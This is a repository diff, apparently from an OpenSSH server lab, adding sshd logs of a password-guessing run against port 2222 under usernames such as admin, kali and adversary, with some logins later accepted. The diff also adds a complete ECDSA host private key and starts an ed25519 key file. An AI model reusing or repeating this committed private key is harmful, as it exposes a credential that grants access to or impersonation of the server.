+2023-11-06 22:48:07.922881589  Invalid user adaliah from 172.18.0.1 port 57766
+2023-11-06 22:48:08.953212382  Could not get shadow information for NOUSER
+2023-11-06 22:48:08.969336173  Failed password for invalid user adaliah from 172.18.0.1 port 57766 ssh2
+2023-11-06 22:48:09.018880965  Invalid user account from 172.18.0.1 port 60686
+2023-11-06 22:48:10.050105174  Could not get shadow information for NOUSER
+2023-11-06 22:48:10.061038799  Failed password for invalid user account from 172.18.0.1 port 60686 ssh2
+2023-11-06 22:48:10.105418299  Invalid user vagrant from 172.18.0.1 port 60688
+2023-11-06 22:48:11.133851258  Could not get shadow information for NOUSER
+2023-11-06 22:48:11.145637924  Failed password for invalid user vagrant from 172.18.0.1 port 60688 ssh2
+2023-11-06 22:48:11.192699424  Invalid user kali from 172.18.0.1 port 60690
+2023-11-06 22:48:12.221855925  Could not get shadow information for NOUSER
+2023-11-06 22:48:12.235747258  Failed password for invalid user kali from 172.18.0.1 port 60690 ssh2
+2023-11-06 22:48:13.336727259  Failed password for user from 172.18.0.1 port 60692 ssh2
+2023-11-06 22:48:13.390166759  Invalid user account from 172.18.0.1 port 60700
+2023-11-06 22:48:14.420674176  Could not get shadow information for NOUSER
+2023-11-06 22:48:14.433940009  Failed password for invalid user account from 172.18.0.1 port 60700 ssh2
+2023-11-06 22:48:14.474556051  Invalid user vagrant from 172.18.0.1 port 60702
+2023-11-06 22:48:15.505633051  Could not get shadow information for NOUSER
+2023-11-06 22:48:15.517580676  Failed password for invalid user vagrant from 172.18.0.1 port 60702 ssh2
+2023-11-06 22:48:15.561937051  Invalid user admin from 172.18.0.1 port 60712
+2023-11-06 22:48:16.596020885  Could not get shadow information for NOUSER
+2023-11-06 22:48:16.607210885  Failed password for invalid user admin from 172.18.0.1 port 60712 ssh2
+2023-11-06 22:48:16.658153094  Invalid user account from 172.18.0.1 port 60714
+2023-11-06 22:48:17.691616594  Could not get shadow information for NOUSER
+2023-11-06 22:48:17.710160386  Failed password for invalid user account from 172.18.0.1 port 60714 ssh2
+2023-11-06 22:48:17.762175469  Invalid user vagrant from 172.18.0.1 port 60716
+2023-11-06 22:48:18.794953178  Could not get shadow information for NOUSER
+2023-11-06 22:48:18.810801428  Failed password for invalid user vagrant from 172.18.0.1 port 60716 ssh2
+2023-11-06 22:48:18.870966636  Invalid user admin from 172.18.0.1 port 59598
+2023-11-06 22:48:19.910493428  Could not get shadow information for NOUSER
+2023-11-06 22:48:19.923454345  Failed password for invalid user admin from 172.18.0.1 port 59598 ssh2
+2023-11-06 22:48:19.968721137  Invalid user account from 172.18.0.1 port 59600
+2023-11-06 22:48:20.997565512  Could not get shadow information for NOUSER
+2023-11-06 22:48:21.010048846  Failed password for invalid user account from 172.18.0.1 port 59600 ssh2
+2023-11-06 22:48:21.061407012  Invalid user account from 172.18.0.1 port 59614
+2023-11-06 22:48:22.094652388  Could not get shadow information for NOUSER
+2023-11-06 22:48:22.105072054  Failed password for invalid user account from 172.18.0.1 port 59614 ssh2
+2023-11-06 22:48:22.150856263  Invalid user kali from 172.18.0.1 port 59618
+2023-11-06 22:48:23.178066763  Could not get shadow information for NOUSER
+2023-11-06 22:48:23.181511347  Failed password for invalid user kali from 172.18.0.1 port 59618 ssh2
+2023-11-06 22:48:23.226933180  Invalid user admin from 172.18.0.1 port 59626
+2023-11-06 22:48:24.258626875  Could not get shadow information for NOUSER
+2023-11-06 22:48:24.269883208  Failed password for invalid user admin from 172.18.0.1 port 59626 ssh2
+2023-11-06 22:48:24.318894125  Invalid user account from 172.18.0.1 port 59628
+2023-11-06 22:48:25.350550792  Could not get shadow information for NOUSER
+2023-11-06 22:48:25.362434542  Failed password for invalid user account from 172.18.0.1 port 59628 ssh2
+2023-11-06 22:48:25.408176125  Invalid user vagrant from 172.18.0.1 port 59630
+2023-11-06 22:48:26.444898876  Could not get shadow information for NOUSER
+2023-11-06 22:48:26.449472334  Failed password for invalid user vagrant from 172.18.0.1 port 59630 ssh2
+2023-11-06 22:48:26.498575167  Invalid user adaliah from 172.18.0.1 port 59636
+2023-11-06 22:48:27.535871876  Could not get shadow information for NOUSER
+2023-11-06 22:48:27.543689876  Failed password for invalid user adaliah from 172.18.0.1 port 59636 ssh2
+2023-11-06 22:48:27.584960251  Invalid user adversary from 172.18.0.1 port 59638
+2023-11-06 22:48:28.622973460  Could not get shadow information for NOUSER
+2023-11-06 22:48:28.636902085  Failed password for invalid user adversary from 172.18.0.1 port 59638 ssh2
+2023-11-06 22:48:28.684833043  Invalid user account from 172.18.0.1 port 59642
+2023-11-06 22:48:29.725476919  Could not get shadow information for NOUSER
+2023-11-06 22:48:29.729137252  Failed password for invalid user account from 172.18.0.1 port 59642 ssh2
+2023-11-06 22:48:30.824672003  Failed password for user from 172.18.0.1 port 62338 ssh2
+2023-11-06 22:48:30.876511669  Invalid user admin from 172.18.0.1 port 62344
+2023-11-06 22:48:31.912548545  Could not get shadow information for NOUSER
+2023-11-06 22:48:31.924813503  Failed password for invalid user admin from 172.18.0.1 port 62344 ssh2
+2023-11-06 22:48:31.969595462  Invalid user kali from 172.18.0.1 port 62350
+2023-11-06 22:48:33.003719045  Could not get shadow information for NOUSER
+2023-11-06 22:48:33.013054795  Failed password for invalid user kali from 172.18.0.1 port 62350 ssh2
+2023-11-06 22:48:34.105514088  Failed password for user from 172.18.0.1 port 62352 ssh2
+2023-11-06 22:48:34.159537421  Invalid user account from 172.18.0.1 port 62360
+2023-11-06 22:48:35.191449088  Could not get shadow information for NOUSER
+2023-11-06 22:48:35.203445463  Failed password for invalid user account from 172.18.0.1 port 62360 ssh2
+2023-11-06 22:48:35.252894921  Invalid user admin from 172.18.0.1 port 62372
+2023-11-06 22:48:36.291224672  Could not get shadow information for NOUSER
+2023-11-06 22:48:36.301858630  Failed password for invalid user admin from 172.18.0.1 port 62372 ssh2
+2023-11-06 22:48:36.348375547  Invalid user account from 172.18.0.1 port 62374
+2023-11-06 22:48:37.389955881  Could not get shadow information for NOUSER
+2023-11-06 22:48:37.396509922  Failed password for invalid user account from 172.18.0.1 port 62374 ssh2
+2023-11-06 22:48:37.437288172  Invalid user vagrant from 172.18.0.1 port 62376
+2023-11-06 22:48:38.469349340  Could not get shadow information for NOUSER
+2023-11-06 22:48:38.480299756  Failed password for invalid user vagrant from 172.18.0.1 port 62376 ssh2
+2023-11-06 22:48:38.528076340  Invalid user adaliah from 172.18.0.1 port 62382
+2023-11-06 22:48:39.556368590  Could not get shadow information for NOUSER
+2023-11-06 22:48:39.569445965  Failed password for invalid user adaliah from 172.18.0.1 port 62382 ssh2
+2023-11-06 22:48:39.623015424  Invalid user account from 172.18.0.1 port 59512
+2023-11-06 22:48:40.654591091  Could not get shadow information for NOUSER
+2023-11-06 22:48:40.667488841  Failed password for invalid user account from 172.18.0.1 port 59512 ssh2
+2023-11-06 22:48:40.717989299  Invalid user kali from 172.18.0.1 port 59516
+2023-11-06 22:48:41.746033675  Could not get shadow information for NOUSER
+2023-11-06 22:48:41.758365425  Failed password for invalid user kali from 172.18.0.1 port 59516 ssh2
+2023-11-06 22:48:41.807447966  Invalid user adversary from 172.18.0.1 port 59522
+2023-11-06 22:48:42.842157175  Could not get shadow information for NOUSER
+2023-11-06 22:48:42.853745675  Failed password for invalid user adversary from 172.18.0.1 port 59522 ssh2
+2023-11-06 22:48:42.895714092  Invalid user admin from 172.18.0.1 port 59524
+2023-11-06 22:48:43.936746551  Could not get shadow information for NOUSER
+2023-11-06 22:48:43.948636592  Failed password for invalid user admin from 172.18.0.1 port 59524 ssh2
+2023-11-06 22:48:43.998632384  Invalid user kali from 172.18.0.1 port 59530
+2023-11-06 22:48:45.033451551  Could not get shadow information for NOUSER
+2023-11-06 22:48:45.043029093  Failed password for invalid user kali from 172.18.0.1 port 59530 ssh2
+2023-11-06 22:48:45.092704926  Invalid user account from 172.18.0.1 port 59540
+2023-11-06 22:48:46.131901635  Could not get shadow information for NOUSER
+2023-11-06 22:48:46.146019510  Failed password for invalid user account from 172.18.0.1 port 59540 ssh2
+2023-11-06 22:48:46.203998968  Invalid user adaliah from 172.18.0.1 port 59548
+2023-11-06 22:48:47.233037969  Could not get shadow information for NOUSER
+2023-11-06 22:48:47.242970094  Failed password for invalid user adaliah from 172.18.0.1 port 59548 ssh2
+2023-11-06 22:48:47.297127094  Invalid user account from 172.18.0.1 port 59554
+2023-11-06 22:48:48.343580636  Could not get shadow information for NOUSER
+2023-11-06 22:48:48.348377719  Failed password for invalid user account from 172.18.0.1 port 59554 ssh2
+2023-11-06 22:48:48.388330469  Invalid user kali from 172.18.0.1 port 59558
+2023-11-06 22:48:49.418140595  Could not get shadow information for NOUSER
+2023-11-06 22:48:49.427916428  Failed password for invalid user kali from 172.18.0.1 port 59558 ssh2
+2023-11-06 22:48:49.486853803  Invalid user adaliah from 172.18.0.1 port 64914
+2023-11-06 22:48:50.514166137  Could not get shadow information for NOUSER
+2023-11-06 22:48:50.526111929  Failed password for invalid user adaliah from 172.18.0.1 port 64914 ssh2
+2023-11-06 22:48:50.576187762  Invalid user adversary from 172.18.0.1 port 64916
+2023-11-06 22:48:51.618145096  Could not get shadow information for NOUSER
+2023-11-06 22:48:51.621678679  Failed password for invalid user adversary from 172.18.0.1 port 64916 ssh2
+2023-11-06 22:48:52.714494680  Failed password for user from 172.18.0.1 port 64926 ssh2
+2023-11-06 22:48:52.782944263  Invalid user admin from 172.18.0.1 port 64960
+2023-11-06 22:48:53.820247889  Could not get shadow information for NOUSER
+2023-11-06 22:48:53.832695930  Failed password for invalid user admin from 172.18.0.1 port 64960 ssh2
+2023-11-06 22:48:53.892832264  Invalid user vagrant from 172.18.0.1 port 64978
+2023-11-06 22:48:54.923819583  Could not get shadow information for NOUSER
+2023-11-06 22:48:54.937060333  Failed password for invalid user vagrant from 172.18.0.1 port 64978 ssh2
+2023-11-06 22:48:54.999444833  Invalid user account from 172.18.0.1 port 64990
+2023-11-06 22:48:56.032824750  Could not get shadow information for NOUSER
+2023-11-06 22:48:56.045057667  Failed password for invalid user account from 172.18.0.1 port 64990 ssh2
+2023-11-06 22:48:56.089747167  Invalid user kali from 172.18.0.1 port 64994
+2023-11-06 22:48:57.122720418  Could not get shadow information for NOUSER
+2023-11-06 22:48:57.137538918  Failed password for invalid user kali from 172.18.0.1 port 64994 ssh2
+2023-11-06 22:48:57.196935293  Invalid user admin from 172.18.0.1 port 65002
+2023-11-06 22:48:58.234133293  Could not get shadow information for NOUSER
+2023-11-06 22:48:58.243898293  Failed password for invalid user admin from 172.18.0.1 port 65002 ssh2
+2023-11-06 22:48:58.290686960  Invalid user kali from 172.18.0.1 port 65008
+2023-11-06 22:48:59.320755585  Could not get shadow information for NOUSER
+2023-11-06 22:48:59.333699377  Failed password for invalid user kali from 172.18.0.1 port 65008 ssh2
+2023-11-06 22:48:59.392202002  Invalid user adversary from 172.18.0.1 port 63804
+2023-11-06 22:49:00.425985961  Could not get shadow information for NOUSER
+2023-11-06 22:49:00.438513877  Failed password for invalid user adversary from 172.18.0.1 port 63804 ssh2
+2023-11-06 22:49:00.486707836  Invalid user adversary from 172.18.0.1 port 63818
+2023-11-06 22:49:01.519720711  Could not get shadow information for NOUSER
+2023-11-06 22:49:01.531781795  Failed password for invalid user adversary from 172.18.0.1 port 63818 ssh2
+2023-11-06 22:49:02.629645629  Failed password for user from 172.18.0.1 port 63828 ssh2
+2023-11-06 22:49:03.748132671  Failed password for user from 172.18.0.1 port 63856 ssh2
+2023-11-06 22:49:04.840398296  Failed password for user from 172.18.0.1 port 63870 ssh2
+2023-11-06 22:49:04.937191921  Invalid user kali from 172.18.0.1 port 63924
+2023-11-06 22:49:05.963623422  Could not get shadow information for NOUSER
+2023-11-06 22:49:05.978100797  Failed password for invalid user kali from 172.18.0.1 port 63924 ssh2
+2023-11-06 22:49:06.037463672  Invalid user kali from 172.18.0.1 port 63938
+2023-11-06 22:49:07.077753047  Could not get shadow information for NOUSER
+2023-11-06 22:49:07.081509589  Failed password for invalid user kali from 172.18.0.1 port 63938 ssh2
+2023-11-06 22:49:07.157645381  Invalid user adversary from 172.18.0.1 port 63972
+2023-11-06 22:49:08.197835256  Connection closed by invalid user kali 172.18.0.1 port 65008 [preauth]
+2023-11-06 22:49:08.197841548  Connection closed by invalid user account 172.18.0.1 port 63562 [preauth]
+2023-11-06 22:49:08.205066923  Connection closed by invalid user account 172.18.0.1 port 60686 [preauth]
+2023-11-06 22:49:08.205069798  Connection closed by invalid user vagrant 172.18.0.1 port 57760 [preauth]
+2023-11-06 22:49:08.205070673  Connection closed by invalid user account 172.18.0.1 port 62374 [preauth]
+2023-11-06 22:49:08.205073131  Connection closed by invalid user account 172.18.0.1 port 60700 [preauth]
+2023-11-06 22:49:08.205073756  Connection closed by invalid user adversary 172.18.0.1 port 63972 [preauth]
+2023-11-06 22:49:08.205074840  Connection closed by invalid user admin 172.18.0.1 port 59598 [preauth]
+2023-11-06 22:49:08.205075465  Connection closed by invalid user kali 172.18.0.1 port 57748 [preauth]
+2023-11-06 22:49:08.205076006  Connection closed by invalid user kali 172.18.0.1 port 64994 [preauth]
+2023-11-06 22:49:08.205076548  Connection closed by invalid user admin 172.18.0.1 port 62344 [preauth]
+2023-11-06 22:49:08.205077090  Connection closed by invalid user kali 172.18.0.1 port 63924 [preauth]
+2023-11-06 22:49:08.205085798  Connection closed by invalid user account 172.18.0.1 port 59554 [preauth]
+2023-11-06 22:49:08.207773798  Connection closed by invalid user account 172.18.0.1 port 59642 [preauth]
+2023-11-06 22:49:08.207784131  Connection closed by invalid user adaliah 172.18.0.1 port 59548 [preauth]
+2023-11-06 22:49:08.207785006  Connection closed by authenticating user user 172.18.0.1 port 60692 [preauth]
+2023-11-06 22:49:08.207785715  Connection closed by invalid user account 172.18.0.1 port 57176 [preauth]
+2023-11-06 22:49:08.207786298  Connection closed by invalid user adaliah 172.18.0.1 port 63584 [preauth]
+2023-11-06 22:49:08.207786881  Connection closed by authenticating user user 172.18.0.1 port 62352 [preauth]
+2023-11-06 22:49:08.207787423  Connection closed by invalid user adaliah 172.18.0.1 port 57752 [preauth]
+2023-11-06 22:49:08.207787965  Connection closed by invalid user admin 172.18.0.1 port 59626 [preauth]
+2023-11-06 22:49:08.207793965  Connection closed by invalid user admin 172.18.0.1 port 59524 [preauth]
+2023-11-06 22:49:08.207794590  Connection closed by authenticating user user 172.18.0.1 port 57736 [preauth]
+2023-11-06 22:49:08.207795173  Connection closed by invalid user account 172.18.0.1 port 59540 [preauth]
+2023-11-06 22:49:08.207795756  Connection closed by invalid user adversary 172.18.0.1 port 63572 [preauth]
+2023-11-06 22:49:08.207796340  Connection closed by authenticating user user 172.18.0.1 port 63828 [preauth]
+2023-11-06 22:49:08.207796881  Connection closed by invalid user vagrant 172.18.0.1 port 60688 [preauth]
+2023-11-06 22:49:08.207803590  Connection closed by invalid user kali 172.18.0.1 port 56806 [preauth]
+2023-11-06 22:49:08.207804256  Connection closed by authenticating user user 172.18.0.1 port 57750 [preauth]
+2023-11-06 22:49:08.207804840  Connection closed by invalid user admin 172.18.0.1 port 60712 [preauth]
+2023-11-06 22:49:08.207805381  Connection closed by invalid user account 172.18.0.1 port 59628 [preauth]
+2023-11-06 22:49:08.207805965  Connection closed by invalid user adversary 172.18.0.1 port 57172 [preauth]
+2023-11-06 22:49:08.207806506  Connection closed by invalid user adaliah 172.18.0.1 port 57766 [preauth]
+2023-11-06 22:49:08.207807048  Connection closed by invalid user vagrant 172.18.0.1 port 59630 [preauth]
+2023-11-06 22:49:08.207807590  Connection closed by invalid user account 172.18.0.1 port 60714 [preauth]
+2023-11-06 22:49:08.207808173  Connection closed by invalid user account 172.18.0.1 port 59600 [preauth]
+2023-11-06 22:49:08.207808715  Connection closed by invalid user kali 172.18.0.1 port 60690 [preauth]
+2023-11-06 22:49:08.207809256  Connection closed by invalid user adversary 172.18.0.1 port 63818 [preauth]
+2023-11-06 22:49:08.207809798  Connection closed by invalid user admin 172.18.0.1 port 63574 [preauth]
+2023-11-06 22:49:08.207810340  Connection closed by invalid user vagrant 172.18.0.1 port 60702 [preauth]
+2023-11-06 22:49:08.207815423  Connection closed by invalid user admin 172.18.0.1 port 57174 [preauth]
+2023-11-06 22:49:08.207816006  Connection closed by invalid user kali 172.18.0.1 port 62350 [preauth]
+2023-11-06 22:49:08.207816590  Connection closed by invalid user vagrant 172.18.0.1 port 56804 [preauth]
+2023-11-06 22:49:08.207817131  Connection closed by invalid user kali 172.18.0.1 port 59618 [preauth]
+2023-11-06 22:49:08.207817673  Connection closed by invalid user adaliah 172.18.0.1 port 57170 [preauth]
+2023-11-06 22:49:08.207818256  Connection closed by invalid user vagrant 172.18.0.1 port 62376 [preauth]
+2023-11-06 22:49:08.207818798  Connection closed by invalid user adversary 172.18.0.1 port 63804 [preauth]
+2023-11-06 22:49:08.207819340  Connection closed by invalid user adaliah 172.18.0.1 port 56810 [preauth]
+2023-11-06 22:49:08.207819881  Connection closed by invalid user adaliah 172.18.0.1 port 62382 [preauth]
+2023-11-06 22:49:08.207820423  Connection closed by invalid user vagrant 172.18.0.1 port 60716 [preauth]
+2023-11-06 22:49:08.207821006  Connection closed by invalid user adversary 172.18.0.1 port 64916 [preauth]
+2023-11-06 22:49:08.207826840  Connection closed by invalid user kali 172.18.0.1 port 59558 [preauth]
+2023-11-06 22:49:08.207827465  Connection closed by authenticating user user 172.18.0.1 port 57168 [preauth]
+2023-11-06 22:49:08.207828006  Connection closed by invalid user adaliah 172.18.0.1 port 57184 [preauth]
+2023-11-06 22:49:08.207828590  Connection closed by invalid user vagrant 172.18.0.1 port 57746 [preauth]
+2023-11-06 22:49:08.207829131  Connection closed by invalid user adaliah 172.18.0.1 port 63570 [preauth]
+2023-11-06 22:49:08.207829715  Connection closed by authenticating user user 172.18.0.1 port 64926 [preauth]
+2023-11-06 22:49:08.212886298  Connection closed by invalid user admin 172.18.0.1 port 62372 [preauth]
+2023-11-06 22:49:08.212888631  Connection closed by invalid user account 172.18.0.1 port 56802 [preauth]
+2023-11-06 22:49:08.212889215  Connection closed by invalid user account 172.18.0.1 port 59614 [preauth]
+2023-11-06 22:49:08.212889798  Connection closed by invalid user vagrant 172.18.0.1 port 56818 [preauth]
+2023-11-06 22:49:08.212890340  Connection closed by invalid user adaliah 172.18.0.1 port 64914 [preauth]
+2023-11-06 22:49:08.212890923  Connection closed by authenticating user user 172.18.0.1 port 63856 [preauth]
+2023-11-06 22:49:08.212891465  Connection closed by invalid user account 172.18.0.1 port 63590 [preauth]
+2023-11-06 22:49:08.212892006  Connection closed by invalid user vagrant 172.18.0.1 port 63578 [preauth]
+2023-11-06 22:49:08.212892548  Connection closed by invalid user adversary 172.18.0.1 port 59638 [preauth]
+2023-11-06 22:49:08.212893131  Connection closed by authenticating user user 172.18.0.1 port 63582 [preauth]
+2023-11-06 22:49:08.212893673  Connection closed by invalid user adaliah 172.18.0.1 port 59636 [preauth]
+2023-11-06 22:49:08.212894256  Connection closed by authenticating user user 172.18.0.1 port 56808 [preauth]
+2023-11-06 22:49:08.212894798  Connection closed by authenticating user user 172.18.0.1 port 62338 [preauth]
+2023-11-06 22:49:08.212895340  Connection closed by invalid user admin 172.18.0.1 port 64960 [preauth]
+2023-11-06 22:49:08.212895881  Connection closed by invalid user account 172.18.0.1 port 57744 [preauth]
+2023-11-06 22:49:08.212896423  Connection closed by invalid user adversary 172.18.0.1 port 56812 [preauth]
+2023-11-06 22:49:08.212897006  Connection closed by invalid user vagrant 172.18.0.1 port 64978 [preauth]
+2023-11-06 22:49:08.212897590  Connection closed by invalid user account 172.18.0.1 port 59512 [preauth]
+2023-11-06 22:49:08.212898131  Connection closed by invalid user account 172.18.0.1 port 56816 [preauth]
+2023-11-06 22:49:08.212898673  Connection closed by authenticating user user 172.18.0.1 port 63870 [preauth]
+2023-11-06 22:49:08.212899215  Connection closed by invalid user kali 172.18.0.1 port 57166 [preauth]
+2023-11-06 22:49:08.212899798  Connection closed by invalid user admin 172.18.0.1 port 57742 [preauth]
+2023-11-06 22:49:08.212900340  Connection closed by invalid user account 172.18.0.1 port 64990 [preauth]
+2023-11-06 22:49:08.212900881  Connection closed by invalid user kali 172.18.0.1 port 63580 [preauth]
+2023-11-06 22:49:08.212901423  Connection closed by invalid user admin 172.18.0.1 port 55098 [preauth]
+2023-11-06 22:49:08.212901965  Connection closed by invalid user adversary 172.18.0.1 port 59522 [preauth]
+2023-11-06 22:49:08.212902506  Connection closed by invalid user vagrant 172.18.0.1 port 57178 [preauth]
+2023-11-06 22:49:08.212903048  Connection closed by invalid user admin 172.18.0.1 port 57188 [preauth]
+2023-11-06 22:49:08.212903590  Connection closed by invalid user admin 172.18.0.1 port 56814 [preauth]
+2023-11-06 22:49:08.212904131  Connection closed by invalid user kali 172.18.0.1 port 59530 [preauth]
+2023-11-06 22:49:08.212904673  Connection closed by invalid user kali 172.18.0.1 port 59516 [preauth]
+2023-11-06 22:49:08.212905215  Connection closed by invalid user admin 172.18.0.1 port 65002 [preauth]
+2023-11-06 22:49:08.212905756  Connection closed by invalid user account 172.18.0.1 port 62360 [preauth]
+2023-11-06 22:49:08.218237256  Connection closed by invalid user kali 172.18.0.1 port 63938 [preauth]
+2023-11-06 22:50:30.547574878  exited MaxStartups throttling after 00:02:43, 203 connections dropped
+2023-11-06 22:50:30.611369628  Invalid user admin from 172.18.0.1 port 63728
+2023-11-06 22:50:31.648032961  Could not get shadow information for NOUSER
+2023-11-06 22:50:31.661398003  Failed password for invalid user admin from 172.18.0.1 port 63728 ssh2
+2023-11-06 22:50:31.716389086  Invalid user account from 172.18.0.1 port 63730
+2023-11-06 22:50:32.749380045  Could not get shadow information for NOUSER
+2023-11-06 22:50:32.759296295  Failed password for invalid user account from 172.18.0.1 port 63730 ssh2
+2023-11-06 22:50:32.829077545  Invalid user vagrant from 172.18.0.1 port 63732
+2023-11-06 22:50:33.866049421  Could not get shadow information for NOUSER
+2023-11-06 22:50:33.880336129  Failed password for invalid user vagrant from 172.18.0.1 port 63732 ssh2
+2023-11-06 22:50:33.934368962  Invalid user kali from 172.18.0.1 port 63734
+2023-11-06 22:50:34.963119630  Could not get shadow information for NOUSER
+2023-11-06 22:50:34.976840796  Failed password for invalid user kali from 172.18.0.1 port 63734 ssh2
+2023-11-06 22:50:36.076450505  Accepted password for user from 172.18.0.1 port 63736 ssh2
+2023-11-06 22:50:37.263250297  Connection closed by invalid user account 172.18.0.1 port 63730 [preauth]
+2023-11-06 22:50:37.263254047  Connection closed by invalid user vagrant 172.18.0.1 port 63732 [preauth]
+2023-11-06 22:50:37.263254881  Connection closed by invalid user admin 172.18.0.1 port 63728 [preauth]
+2023-11-06 22:50:37.263255547  Connection closed by invalid user kali 172.18.0.1 port 63734 [preauth]
+2023-11-06 22:51:37.251529464  Received signal 15; terminating.
+2023-11-07 09:12:43.594864883  Server listening on 0.0.0.0 port 2222.
+2023-11-07 09:12:43.596005716  Server listening on :: port 2222.
+2023-11-07 09:12:44.613713550  kex_exchange_identification: Connection closed by remote host
+2023-11-07 09:12:44.613716633  Connection closed by 127.0.0.1 port 45732
+2023-11-07 09:15:21.527283762  Invalid user admin from 172.18.0.1 port 63422
+2023-11-07 09:15:22.562802095  Could not get shadow information for NOUSER
+2023-11-07 09:15:22.574269512  Failed password for invalid user admin from 172.18.0.1 port 63422 ssh2
+2023-11-07 09:15:22.627625220  Invalid user account from 172.18.0.1 port 63424
+2023-11-07 09:15:23.666964263  Could not get shadow information for NOUSER
+2023-11-07 09:15:23.674297221  Failed password for invalid user account from 172.18.0.1 port 63424 ssh2
+2023-11-07 09:15:23.720934096  Invalid user vagrant from 172.18.0.1 port 63426
+2023-11-07 09:15:24.751163971  Could not get shadow information for NOUSER
+2023-11-07 09:15:24.764497263  Failed password for invalid user vagrant from 172.18.0.1 port 63426 ssh2
+2023-11-07 09:15:24.825037346  Invalid user kali from 172.18.0.1 port 63428
+2023-11-07 09:15:25.854998555  Could not get shadow information for NOUSER
+2023-11-07 09:15:25.866632055  Failed password for invalid user kali from 172.18.0.1 port 63428 ssh2
+2023-11-07 09:15:26.961224166  Accepted password for user from 172.18.0.1 port 63430 ssh2
+2023-11-07 09:15:28.164384834  Connection closed by invalid user account 172.18.0.1 port 63424 [preauth]
+2023-11-07 09:15:28.164387959  Connection closed by invalid user vagrant 172.18.0.1 port 63426 [preauth]
+2023-11-07 09:15:28.164390792  Connection closed by invalid user admin 172.18.0.1 port 63422 [preauth]
+2023-11-07 09:15:28.164391584  Connection closed by invalid user kali 172.18.0.1 port 63428 [preauth]
+2023-11-07 09:17:58.152928250  Invalid user admin from 172.18.0.1 port 62914
+2023-11-07 09:17:59.191686251  Could not get shadow information for NOUSER
+2023-11-07 09:17:59.202703501  Failed password for invalid user admin from 172.18.0.1 port 62914 ssh2
+2023-11-07 09:17:59.258322584  Invalid user account from 172.18.0.1 port 62916
+2023-11-07 09:18:00.289062501  Could not get shadow information for NOUSER
+2023-11-07 09:18:00.301176168  Failed password for invalid user account from 172.18.0.1 port 62916 ssh2
+2023-11-07 09:18:00.344234751  Invalid user vagrant from 172.18.0.1 port 56078
+2023-11-07 09:18:01.372880294  Could not get shadow information for NOUSER
+2023-11-07 09:18:01.390616794  Failed password for invalid user vagrant from 172.18.0.1 port 56078 ssh2
+2023-11-07 09:18:01.451014544  Invalid user kali from 172.18.0.1 port 56080
+2023-11-07 09:18:02.483192211  Could not get shadow information for NOUSER
+2023-11-07 09:18:02.502678752  Failed password for invalid user kali from 172.18.0.1 port 56080 ssh2
+2023-11-07 09:18:03.597728920  Accepted password for user from 172.18.0.1 port 56082 ssh2
+2023-11-07 09:18:09.848681673  Connection closed by invalid user account 172.18.0.1 port 62916 [preauth]
+2023-11-07 09:18:09.851578339  Connection closed by invalid user kali 172.18.0.1 port 56080 [preauth]
+2023-11-07 09:18:09.851604756  Connection closed by invalid user vagrant 172.18.0.1 port 56078 [preauth]
+2023-11-07 09:18:09.851605589  Connection closed by invalid user admin 172.18.0.1 port 62914 [preauth]
+2023-11-07 09:19:40.981733090  Received signal 15; terminating.
+2023-11-07 10:26:50.175887674  Server listening on 0.0.0.0 port 2222.
+2023-11-07 10:26:50.175937633  Server listening on :: port 2222.
+2023-11-07 10:26:51.206263550  kex_exchange_identification: Connection closed by remote host
+2023-11-07 10:26:51.206266383  Connection closed by 127.0.0.1 port 51652
+2023-11-07 10:27:03.983907708  Invalid user admin from 172.18.0.1 port 58512
+2023-11-07 10:27:05.026391001  Could not get shadow information for NOUSER
+2023-11-07 10:27:05.038054084  Failed password for invalid user admin from 172.18.0.1 port 58512 ssh2
+2023-11-07 10:27:05.093712876  Invalid user account from 172.18.0.1 port 63062
+2023-11-07 10:27:06.126270751  Could not get shadow information for NOUSER
+2023-11-07 10:27:06.140345543  Failed password for invalid user account from 172.18.0.1 port 63062 ssh2
+2023-11-07 10:27:06.197442126  Invalid user vagrant from 172.18.0.1 port 63064
+2023-11-07 10:27:07.234654252  Could not get shadow information for NOUSER
+2023-11-07 10:27:07.246939085  Failed password for invalid user vagrant from 172.18.0.1 port 63064 ssh2
+2023-11-07 10:27:07.297183335  Invalid user kali from 172.18.0.1 port 63066
+2023-11-07 10:27:08.334107835  Could not get shadow information for NOUSER
+2023-11-07 10:27:08.351569002  Failed password for invalid user kali from 172.18.0.1 port 63066 ssh2
+2023-11-07 10:27:09.449011586  Accepted password for user from 172.18.0.1 port 63068 ssh2
+2023-11-07 10:27:15.700639381  Connection closed by invalid user account 172.18.0.1 port 63062 [preauth]
+2023-11-07 10:27:15.700642714  Connection closed by invalid user admin 172.18.0.1 port 58512 [preauth]
+2023-11-07 10:27:15.700646339  Connection closed by invalid user kali 172.18.0.1 port 63066 [preauth]
+2023-11-07 10:27:15.702313006  Connection closed by invalid user vagrant 172.18.0.1 port 63064 [preauth]
--- a/user/config/logs/openssh/lock
+++ b/user/config/logs/openssh/lock
--- a/user/config/logs/openssh/state
+++ b/user/config/logs/openssh/state
--- a/user/config/ssh_host_keys/ssh_host_ecdsa_key
+++ b/user/config/ssh_host_keys/ssh_host_ecdsa_key
@ -0,0 +1,9 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
+1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQTTv/T/PIE5YWHIdfCWdp/09PnmfJow
+CiUiHDv/EXogVtruvVv4nQ0e4jg168UBDZ0wt/TGC4pjnDwW3h3SmsjRAAAAuClmpmMpZq
+ZjAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNO/9P88gTlhYch1
+8JZ2n/T0+eZ8mjAKJSIcO/8ReiBW2u69W/idDR7iODXrxQENnTC39MYLimOcPBbeHdKayN
+EAAAAhAMeKhouNJiFnVM3/PYyK7BMG/IHRWib9RFt1g0O2qg8QAAAAGHJvb3RAb3BlbnNz
+aC1zZXJ2ZXItdXNlcgECAwQFBgc=
+-----END OPENSSH PRIVATE KEY-----
--- a/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub
+++ b/user/config/ssh_host_keys/ssh_host_ecdsa_key.pub
@ -0,0 +1 @@
+ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNO/9P88gTlhYch18JZ2n/T0+eZ8mjAKJSIcO/8ReiBW2u69W/idDR7iODXrxQENnTC39MYLimOcPBbeHdKayNE= root@openssh-server-user
--- a/user/config/ssh_host_keys/ssh_host_ed25519_key
+++ b/user/config/ssh_host_keys/ssh_host_ed25519_key
@ -0,0 +1,7 @@
